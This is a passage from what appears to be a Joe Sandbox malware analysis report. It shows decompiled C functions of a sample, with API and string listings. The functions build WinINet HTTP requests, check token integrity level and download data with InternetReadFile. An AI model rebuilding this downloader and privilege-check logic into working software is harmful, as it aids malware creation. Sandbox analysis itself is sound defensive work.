																return E0040EB3F(_t395, _t400, _v32 ^ _t523, _t485, _t504, _t514);
															} else {
																_t456 = _v56;
																_t485 = _t485 + 1;
																_t352 = _t456;
																__eflags = _t485 - 0x1000;
																if(_t485 < 0x1000) {
																	L64:
																	_push(_t485);
																	E0040ED7F(_t456);
																	goto L65;
																} else {
																	_t456 =  *((intOrPtr*)(_t456 - 4));
																	_t485 = _t485 + 0x23;
																	__eflags = _t352 - _t456 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L67;
																	} else {
																		goto L64;
																	}
																}
															}
														} else {
															_t458 = _v84;
															_t486 = _t484 + 1;
															_t358 = _t458;
															__eflags = _t486 - 0x1000;
															if(_t486 < 0x1000) {
																L60:
																_push(_t486);
																E0040ED7F(_t458);
																_t535 = _t535 + 8;
																goto L61;
															} else {
																_t456 =  *((intOrPtr*)(_t458 - 4));
																_t485 = _t486 + 0x23;
																__eflags = _t358 - _t456 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L67;
																} else {
																	goto L60;
																}
															}
														}
													} else {
														__eflags = _t513 - _t501;
														if(_t513 < _t501) {
															E00402800(_t446, _t483);
															L67:
															E004134A7(_t395, _t485, __eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t523);
															_push(_t513);
															_t515 = _t456;
															_t357 =  *(_t515 + 0x2c);
															 *(_t515 + 0x34) = 0;
															__eflags = _t357;
															if(_t357 != 0) {
																_t357 = L0040EB4D(_t357);
																 *(_t515 + 0x2c) = 0;
															}
															_push(_v8);
															L40();
															return _t357;
														} else {
															_t376 = _t513 - _t501;
															__eflags = _t376 - 7;
															_t488 =  <  ? _t376 : 7;
															__eflags = _t395 - 0x10;
															_t463 =  >=  ? _v56 :  &_v56;
															_t518 = _t513 - 7;
															_t464 =  &(( >=  ? _v56 :  &_v56)[_t501]);
															_v40 = _t518;
															__eflags = _t518 - _t501 + 1;
															E00410440( &(( >=  ? _v56 :  &_v56)[_t501]),  &(( &(( >=  ? _v56 :  &_v56)[_t501]))[ <  ? _t376 : 7]), _t518 - _t501 + 1);
															_t513 = _v40;
															_t535 = _t535 + 0xc;
															goto L45;
														}
													}
												} else {
													goto L24;
												}
											}
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
			}

0x00401a00
0x00401a03
0x00401a05
0x00401a10
0x00401a11
0x00401a14
0x00401a19
0x00401a1b
0x00401a1f
0x00401a20
0x00401a24
0x00401a2a
0x00401a32
0x00401a3e
0x00401a45
0x00401a4c
0x00401a50
0x00401a55
0x00401a69
0x00401a77
0x00401a83
0x00401a97
0x00401a9d
0x00401aa9
0x00401abd
0x00401ac3
0x00401acf
0x00401ae3
0x00401ae9
0x00401aeb
0x00401af1
0x00401b1b
0x00401b1e
0x00401b26
0x00401b27
0x00401b35
0x00401af3
0x00401af3
0x00401af6
0x00401af7
0x00401aff
0x00401b11
0x00401b11
0x00401b13
0x00000000
0x00401b01
0x00401b01
0x00401b04
0x00401b0f
0x00401b38
0x00401b3d
0x00401b3e
0x00401b3f
0x00401b40
0x00401b41
0x00401b43
0x00401b45
0x00401b50
0x00401b51
0x00401b57
0x00401b5c
0x00401b5e
0x00401b61
0x00401b62
0x00401b63
0x00401b64
0x00401b68
0x00401b6e
0x00401b70
0x00401b74
0x00401b77
0x00401b7d
0x00401bac
0x00401b7f
0x00401b84
0x00401b8b
0x00401b90
0x00401b93
0x00401b96
0x00401b9d
0x00401b9d
0x00401bbb
0x00401bc5
0x00401bd0
0x00401be4
0x00401bea
0x00401bf0
0x00401bf2
0x00401bf7
0x00401bfd
0x00401c03
0x00401c0b
0x00401c16
0x00401c18
0x00401c1e
0x00401c26
0x00401c2b
0x00401c31
0x00401c34
0x00401c37
0x00401c37
0x00401c3d
0x00401c3f
0x00000000
0x00000000
0x00401c41
0x00401c43
0x00000000
0x00000000
0x00000000
0x00401c43
0x00401c50
0x00401c5d
0x00401c62
0x00401c78
0x00401c7e
0x00401c80
0x00401fe5
0x00401feb
0x00401ffb
0x00402003
0x00402004
0x00402005
0x00402009
0x00402013
0x00401c86
0x00401c8c
0x00401ca0
0x00401ca6
0x00401cb1
0x00401cb7
0x00401cb9
0x00000000
0x00401cbf
0x00401cbf
0x00401cc6
0x00000000
0x00401ccc
0x00401ccc
0x00401cd2
0x00401cdc
0x00401ce6
0x00401ce9
0x00401cf3
0x00401cfa
0x00401d00
0x00401d00
0x00401d02
0x00401d03
0x00401d03
0x00401d17
0x00401d1c
0x00401d2f
0x00401d35
0x00401d36
0x00401d3f
0x00401d4e
0x00401d58
0x00401d69
0x00401d6e
0x00401d71
0x00401d77
0x00401d84
0x00401d8c
0x00401d9a
0x00401d9c
0x00401d9e
0x00401da8
0x00401daa
0x00401db4
0x00401dbe
0x00401dc5
0x00401dc5
0x00401dd0
0x00401dd0
0x00401dd3
0x00401dd6
0x00401dd6
0x00401de7
0x00401ded
0x00401df2
0x00401df5
0x00401dff
0x00401e0b
0x00401e13
0x00401e23
0x00401e26
0x00401e2a
0x00401e2c
0x00401e32
0x00401e35
0x00401e6c
0x00401e6e
0x00401e75
0x00401e7b
0x00401e85
0x00401e8f
0x00401e96
0x00401e99
0x00401eca
0x00401eca
0x00401ecc
0x00401ed2
0x00401ed9
0x00401eef
0x00401ef2
0x00401efd
0x00401f03
0x00401f09
0x00401f15
0x00401f1f
0x00401f2e
0x00401f35
0x00401f41
0x00401f4e
0x00401f51
0x00401f53
0x00401f55
0x00401f5b
0x00401f5e
0x00401f61
0x00401f63
0x00401f9d
0x00401f65
0x00401f6c
0x00401f77
0x00401f7f
0x00401f87
0x00401f8c
0x00401f8f
0x00401f92
0x00401f98
0x00401f98
0x00401fa7
0x00401fac
0x00401fb7
0x00401fba
0x00401fba
0x00401fbc
0x00401fbc
0x00401fc5
0x00401fca
0x00401fd6
0x00401fd6
0x00401ed9
0x00401fd9
0x00401fe2
0x00000000
0x00401e9b
0x00401e9b
0x00401ea1
0x00401ea2
0x00401ea4
0x00401eaa
0x00401ec0
0x00401ec0
0x00401ec2
0x00401ec7
0x00000000
0x00401eac
0x00401eac
0x00401eaf
0x00401eb7
0x00401eba
0x00000000
0x00000000
0x00000000
0x00000000
0x00401eba
0x00401eaa
0x00401e37
0x00401e37
0x00401e3d
0x00401e44
0x00401e46
0x00401e4c
0x00401e62
0x00401e62
0x00401e64
0x00401e69
0x00000000
0x00401e4e
0x00401e4e
0x00401e51
0x00401e59
0x00401e5c
0x00402016
0x00402016
0x0040201b
0x0040201c
0x0040201d
0x0040201e
0x0040201f
0x00402020
0x00402021
0x00402023
0x00402025
0x00402030
0x00402031
0x00402039
0x00402039
0x0040203b
0x0040203e
0x0040203f
0x00402040
0x00402041
0x00402045
0x0040204b
0x0040204e
0x00402051
0x00402053
0x0040205a
0x0040205d
0x00402064
0x0040206b
0x0040206e
0x00402072
0x00402072
0x00402074
0x00402075
0x00402075
0x00402080
0x00402085
0x0040208f
0x00402092
0x00402095
0x00402098
0x0040209a
0x004020ab
0x004020ad
0x004020b0
0x004020b3
0x004020f0
0x004020f0
0x004020f7
0x004020fb
0x004020fd
0x00402115
0x00402115
0x00402115
0x004020ff
0x00402108
0x0040210a
0x0040210d
0x0040210f
0x00000000
0x00402111
0x00402111
0x00402111
0x0040210f
0x00402118
0x0040211a
0x00402123
0x0040212a
0x0040212d
0x00402134
0x0040213c
0x00402144
0x00402148
0x0040214d
0x00402154
0x00402157
0x00402159
0x0040215c
0x00402160
0x00402164
0x00402166
0x00402170
0x00402175
0x0040217b
0x00402193
0x0040219b
0x004021a5
0x004021b4
0x004021b6
0x004021b9
0x004021bb
0x004021c6
0x004021d1
0x004021d7
0x004021e0
0x004021f2
0x004021f8
0x004021fe
0x00402200
0x00402202
0x00402204
0x0040220d
0x00402229
0x0040222b
0x0040222d
0x00402230
0x0040223e
0x00402244
0x00402246
0x0040224b
0x0040224c
0x00402251
0x00402251
0x00402255
0x00402255
0x00402258
0x0040225a
0x0040225a
0x0040225e
0x0040225e
0x00402260
0x00402265
0x00402268
0x0040226b
0x0040226e
0x00402298
0x00402298
0x0040229b
0x004022a2
0x004022a9
0x004022ad
0x004022b0
0x004022da
0x004022df
0x004022e7
0x004022e8
0x004022e9
0x004022ed
0x004022f7
0x004022b2
0x004022b2
0x004022b5
0x004022b6
0x004022b8
0x004022be
0x004022d0
0x004022d0
0x004022d2
0x00000000
0x004022c0
0x004022c0
0x004022c3
0x004022cb
0x004022ce
0x00000000
0x00000000
0x00000000
0x00000000
0x004022ce
0x004022be
0x00402270
0x00402270
0x00402273
0x00402274
0x00402276
0x0040227c
0x0040228e
0x0040228e
0x00402290
0x00402295
0x00000000
0x0040227e
0x0040227e
0x00402281
0x00402289
0x0040228c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040228c
0x0040227c
0x004020b5
0x004020b5
0x004020b7
0x004022fa
0x004022ff
0x004022ff
0x00402304
0x00402305
0x00402306
0x00402307
0x00402308
0x00402309
0x0040230a
0x0040230b
0x0040230c
0x0040230d
0x0040230e
0x0040230f
0x00402310
0x00402313
0x00402314
0x00402316
0x00402319
0x00402320
0x00402322
0x00402325
0x0040232d
0x0040232d
0x00402334
0x00402339
0x00402340
0x004020bd
0x004020c2
0x004020c9
0x004020cb
0x004020ce
0x004020d1
0x004020d5
0x004020d7
0x004020d9
0x004020de
0x004020e5
0x004020ea
0x004020ed
0x00000000
0x004020ed
0x004020b7
0x00000000
0x00000000
0x00000000
0x00401e5c
0x00401e4c
0x00401e35
0x00401cc6
0x00401cb9
0x00000000
0x00000000
0x00000000
0x00401b0f
0x00401aff

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401A77
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401A9D

Part of subcall function 004026C0: Concurrency::cancel_current_task.LIBCPMT ref: 004027F3

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401AC3
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401AE9

Strings

GET, xrefs: 0040221D
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401A39
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 00401AA1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401A7B
text, xrefs: 00401E1C
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401AC7

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: HeadersHttpRequest$Concurrency::cancel_current_task
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
API String ID: 2146599340-3782612381
Opcode ID: b953d7a70eac288c36cc75dd3da2b78931e3600a081e637e1606bc314aa3fec6
Instruction ID: d56f613ca99d5951b8ad46e8c453e91991ea1047b5f2e37bc5e4d0d2981f26b9
Opcode Fuzzy Hash: b953d7a70eac288c36cc75dd3da2b78931e3600a081e637e1606bc314aa3fec6
Instruction Fuzzy Hash: 64318331E10109EBDB14DFA9CC81FEEBBB9EB48714F60802AE121771D0D779A544CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042863E Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E0042863E(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E0042838C(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E0042538E(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E004282F7(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E004252D9(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x4508e0 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E004280A4(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x4508e0 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x4508e0 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E004282F7();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x4508e0 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E0041353B(GetLastError());
											 *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E004254A1( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E00428506(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0041EC13(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E0041353B(_t271);
							 *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E00413571(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x4508e0 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0041353B(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E004282F7();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0041355E(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00413571(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E0041355E(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00413571(_t289)));
				}
			}

0x00428661
0x00428665
0x00428666
0x00428666
0x00428666
0x00428668
0x0042866b
0x0042866e
0x00428689
0x0042868e
0x00428691
0x00428693
0x00428695
0x004286b4
0x004286bb
0x004286c2
0x004286c5
0x004286d1
0x004286d4
0x004286dc
0x004286dd
0x004286e0
0x004286e0
0x004286e2
0x004286e7
0x004286e9
0x004286ec
0x004286f4
0x004286f7
0x00428764
0x00428765
0x0042876b
0x0042876d
0x004287b6
0x004287b9
0x004287c2
0x004287c5
0x004287c8
0x004287ca
0x004287ca
0x004287ca
0x004287bb
0x004287be
0x004287be
0x004287cf
0x004287d2
0x004287de
0x004287e3
0x004287ef
0x004287f9
0x004287fd
0x00428807
0x0042880a
0x00428815
0x0042881a
0x00428839
0x0042883c
0x00428840
0x00428841
0x00428847
0x0042884c
0x0042884f
0x00428851
0x00428853
0x00428858
0x0042885a
0x0042885c
0x0042885f
0x00428861
0x0042887b
0x0042889f
0x004288a3
0x004288a7
0x004288a9
0x004288ad
0x004288af
0x004288b9
0x004288bc
0x004288c3
0x004288c3
0x004288c3
0x004288c3
0x004288ad
0x004288c8
0x004288d4
0x004288d6
0x00428961
0x00428961
0x00000000
0x004288dc
0x004288dc
0x004288e0
0x00000000
0x00000000
0x004288e5
0x004288f7
0x004288ff
0x00428902
0x00428903
0x00428906
0x0042890d
0x00428912
0x00428915
0x00428949
0x00428953
0x00428953
0x0042895d
0x00000000
0x0042895d
0x0042891e
0x00428937
0x0042893e
0x0042875e
0x00000000
0x0042875e
0x004288d6
0x00428863
0x00000000
0x0042881c
0x00428823
0x00428826
0x00428828
0x00000000
0x00000000
0x0042882a
0x0042882c
0x0042882c
0x00000000
0x00428832
0x0042881a
0x00428775
0x00428778
0x00428793
0x00428798
0x0042879e
0x004287a0
0x004287ab
0x004287ab
0x00000000
0x004287a0
0x004286f9
0x00428700
0x00428702
0x00428739
0x00428739
0x00428743
0x00428746
0x0042874d
0x0042874d
0x0042874d
0x00428759
0x00000000
0x00428759
0x00428704
0x00428708
0x00000000
0x00000000
0x0042870a
0x00428719
0x0042871e
0x00428721
0x00428722
0x00428725
0x00428725
0x0042872c
0x0042872e
0x00428731
0x00428734
0x00428737
0x00000000
0x00000000
0x00000000
0x00428697
0x0042869c
0x0042869f
0x004286a6
0x00000000
0x004286a6
0x00428670
0x00428670
0x00428675
0x00428675
0x0042867b
0x0042867d
0x00000000
0x00428682

APIs

Part of subcall function 004282F7: CreateFileW.KERNELBASE(00000000,00000000,?,004286E7,?,?,00000000,?,004286E7,00000000,0000000C), ref: 00428314

GetLastError.KERNEL32 ref: 00428752
__dosmaperr.LIBCMT ref: 00428759
GetFileType.KERNELBASE(00000000), ref: 00428765
GetLastError.KERNEL32 ref: 0042876F
__dosmaperr.LIBCMT ref: 00428778
CloseHandle.KERNEL32(00000000), ref: 00428798
CloseHandle.KERNEL32(?), ref: 004288E5
GetLastError.KERNEL32 ref: 00428917
__dosmaperr.LIBCMT ref: 0042891E

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: cdf5ef2873a73ee89aeb392416d28c2a8e100c1643c37962a50c484033c6f312
Instruction ID: 72ca82fc45cf2a8237886b126cc6aed0b6ee58280a9bb121733cf9d88e20c945
Opcode Fuzzy Hash: cdf5ef2873a73ee89aeb392416d28c2a8e100c1643c37962a50c484033c6f312
Instruction Fuzzy Hash: 25A14C31B011649FCF19EF68EC51BAE3BA1AF46324F54015EE811AB391CB399942CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004065E0 Relevance: 12.1, APIs: 8, Instructions: 67
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004065E0(void* __esi) {
				signed int _v8;
				void _v84;
				short _v88;
				struct _SID_IDENTIFIER_AUTHORITY _v92;
				long _v96;
				void* _v100;
				void* _v104;
				signed int _t16;
				int _t25;
				int _t30;
				void* _t35;
				void* _t40;
				void* _t41;
				void* _t44;
				signed int _t45;

				_t42 = __esi;
				_t16 =  *0x43d054; // 0x8e1b5714
				_v8 = _t16 ^ _t45;
				_v92.Value = 0;
				_v88 = 0x500;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v100) == 0) {
					L3:
					return E0040EB3F(0, _t35, _v8 ^ _t45, _t40, _t41, _t42);
				} else {
					_t25 = GetTokenInformation(_v100, 1,  &_v84, 0x4c,  &_v96); // executed
					_push(_v100);
					if(_t25 != 0) {
						CloseHandle();
						if(AllocateAndInitializeSid( &_v92, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v104) == 0) {
							goto L3;
						} else {
							_push(__esi);
							_t30 = EqualSid(_v84, _v104);
							FreeSid(_v104);
							_pop(_t44);
							return E0040EB3F(_t30, _t35, _v8 ^ _t45, _t40, _t41, _t44);
						}
					} else {
						CloseHandle();
						goto L3;
					}
				}
			}

0x004065e0
0x004065e6
0x004065ed
0x004065f3
0x004065fd
0x00406612
0x00406636
0x00406645
0x00406614
0x00406623
0x00406629
0x0040662e
0x00406646
0x0040666e
0x00000000
0x00406670
0x00406670
0x00406677
0x00406682
0x0040668f
0x00406698
0x00406698
0x00406630
0x00406630
0x00000000
0x00406630
0x0040662e

APIs

GetCurrentProcess.KERNEL32(00000008,?), ref: 00406603
OpenProcessToken.ADVAPI32(00000000), ref: 0040660A
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 00406623
CloseHandle.KERNEL32(?), ref: 00406630
CloseHandle.KERNEL32(?), ref: 00406646
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00406666
EqualSid.ADVAPI32(?,?), ref: 00406677
FreeSid.ADVAPI32(?), ref: 00406682

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AllocateCurrentEqualFreeInformationInitializeOpen
String ID:
API String ID: 1013447061-0
Opcode ID: 1034c4d742e6fd55be77b299a8b49b011f3c5f5b022b0508194a6fa870bf144a
Instruction ID: bfa270bbe54d87111214480625267f7cbec0b86cd68d987a38c4a7ba62a71be1
Opcode Fuzzy Hash: 1034c4d742e6fd55be77b299a8b49b011f3c5f5b022b0508194a6fa870bf144a
Instruction Fuzzy Hash: 62114F31B0021CABDB20DFE1DD49BAEB7B9FF08700F400439E906EA190DA7599168B59

Uniqueness

Uniqueness Score: -1.00%

Function 100011B7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225
networkcomfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E100011B7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t101;
				int _t106;
				intOrPtr _t107;
				void* _t118;
				intOrPtr _t120;
				int _t124;
				void* _t125;
				int _t128;
				void* _t132;
				void** _t137;
				intOrPtr _t143;
				intOrPtr _t147;
				void* _t154;
				intOrPtr* _t160;
				void* _t170;
				void* _t173;
				long _t182;
				void* _t183;
				intOrPtr* _t185;
				intOrPtr _t190;
				intOrPtr _t194;
				signed int _t195;
				void* _t199;
				void* _t200;
				void* _t201;

				_push(0x168);
				E1000E879(0x1000fbbc, __ebx, __edi, __esi);
				_t154 = __ecx;
				_t197 =  *(_t200 + 8);
				_t101 = 0;
				 *(_t200 - 0x140) = _t197;
				_t205 =  *((intOrPtr*)(__ecx + 0x28));
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					_t194 =  *((intOrPtr*)(__ecx + 0x34));
					 *((intOrPtr*)(_t200 - 0x144)) = _t194;
				} else {
					_push(0x7800);
					 *((intOrPtr*)(__ecx + 0x30)) = 0x7800;
					 *(_t154 + 0x28) = E100026B3(__ecx, __edx, _t205);
					_t101 = 0;
					 *((intOrPtr*)(_t154 + 0x34)) = 0;
					_t194 = 0;
					 *((intOrPtr*)(_t200 - 0x144)) = 0;
				}
				 *(_t200 - 0x11c) = _t101;
				InternetSetFilePointer(_t197, _t101, _t101, _t101, _t101);
				do {
					_t106 = InternetReadFile(_t197,  *((intOrPtr*)(_t154 + 0x34)) +  *(_t154 + 0x28), 0x3e8, _t200 - 0x11c); // executed
					_t182 =  *(_t200 - 0x11c);
					 *((intOrPtr*)(_t154 + 0x34)) =  *((intOrPtr*)(_t154 + 0x34)) + _t182;
					 *(_t200 - 0x138) = _t106;
					_t107 =  *((intOrPtr*)(_t154 + 0x30));
					_t206 = _t107 -  *((intOrPtr*)(_t154 + 0x34)) - 0x3e8;
					if(_t107 -  *((intOrPtr*)(_t154 + 0x34)) <= 0x3e8) {
						_t147 = _t107 + 0x7800;
						_push(_t147);
						 *((intOrPtr*)(_t154 + 0x30)) = _t147;
						_t199 = E100026B3(_t154, _t182, _t206);
						E10005070(_t199,  *(_t154 + 0x28),  *((intOrPtr*)(_t154 + 0x34)) + 1);
						E100026CA( *(_t154 + 0x28));
						_t182 =  *(_t200 - 0x11c);
						_t201 = _t201 + 0x14;
						 *(_t154 + 0x28) = _t199;
						_t197 =  *(_t200 - 0x140);
					}
				} while ( *(_t200 - 0x138) != 0 && _t182 != 0);
				 *(_t200 - 0x11c) = 0x103;
